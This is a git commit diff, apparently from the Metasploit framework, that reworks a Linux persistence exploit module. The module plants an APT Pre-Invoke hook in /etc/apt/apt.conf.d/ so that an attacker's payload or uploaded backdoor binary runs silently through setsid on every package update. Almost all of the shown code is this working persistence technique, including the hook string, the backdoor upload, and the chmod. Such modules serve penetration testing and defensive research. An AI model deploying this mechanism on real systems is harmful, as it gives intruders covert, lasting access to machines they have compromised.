apt_package_manager payload optimizations

h00die · h00die · commit 64a391185d79 · 2025-02-20T16:51:18.000-05:00
diff --git a/modules/exploits/linux/persistence/apt_package_manager.rb b/modules/exploits/linux/persistence/apt_package_manager.rb
@@ -59,12 +59,10 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
-        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write']),
+        OptString.new('PAYLOAD_NAME', [false, 'Name of binary to write']),
         OptString.new('HOOKPATH', [true, 'The directory where the apt configurations are located', '/etc/apt/apt.conf.d/'])
       ]
     )
-
-    deregister_options('WritableDir')
   end
 
   def check
@@ -82,33 +80,30 @@ def install_persistence
     hook_path = datastore['HOOKPATH']
     hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")
 
-    backdoor_path = datastore['WritableDir']
-    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
-    backdoor_path << backdoor_name
-
-    print_status('Attempting to write hook:')
-    hook_script = %(APT::Update::Pre-Invoke {"setsid #{backdoor_path} 2>/dev/null &"};)
-    write_file(datastore['HOOKPATH'], hook_script)
-
-    fail_with Failure::Unknown, 'Failed to write Hook' unless exist?(datastore['HOOKPATH'])
-
-    print_status("Wrote #{datastore['HOOKPATH']}")
-
     if payload.arch.first == 'cmd'
-      write_file(backdoor_path, payload.encoded)
+      hook_script = %(APT::Update::Pre-Invoke {"setsid #{payload.encoded} 2>/dev/null &"};)
     else
+      backdoor_path = datastore['WritableDir']
+      backdoor_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
+      backdoor_path << backdoor_name
       write_file(backdoor_path, generate_payload_exe)
+      fail_with Failure::Unknown, "Failed to write #{backdoor_path}" unless exist?(backdoor_path)
+      print_status("Backdoor uploaded #{backdoor_path}")
+      # permissions chosen to reflect common perms in /usr/local/bin/
+      chmod(backdoor_path, 0o755)
+
+      print_status('Attempting to write hook')
+      hook_script = %(APT::Update::Pre-Invoke {"setsid #{backdoor_path} 2>/dev/null &"};)
+      @clean_up_rc << "rm #{backdoor_path}\n"
     end
+    write_file(datastore['HOOKPATH'], hook_script)
 
-    fail_with Failure::Unknown, "Failed to write #{backdoor_path}" unless exist?(backdoor_path)
+    fail_with Failure::Unknown, 'Failed to write Hook' unless exist?(datastore['HOOKPATH'])
 
-    print_status("Backdoor uploaded #{backdoor_path}")
-    # permissions chosen to reflect common perms in /usr/local/bin/
-    chmod(backdoor_path, 0o755)
+    print_status("Wrote #{datastore['HOOKPATH']}")
 
     print_good('Backdoor will run on next APT update')
 
     @clean_up_rc << "rm #{datastore['HOOKPATH']}\n"
-    @clean_up_rc << "rm #{backdoor_path}\n"
   end
 end
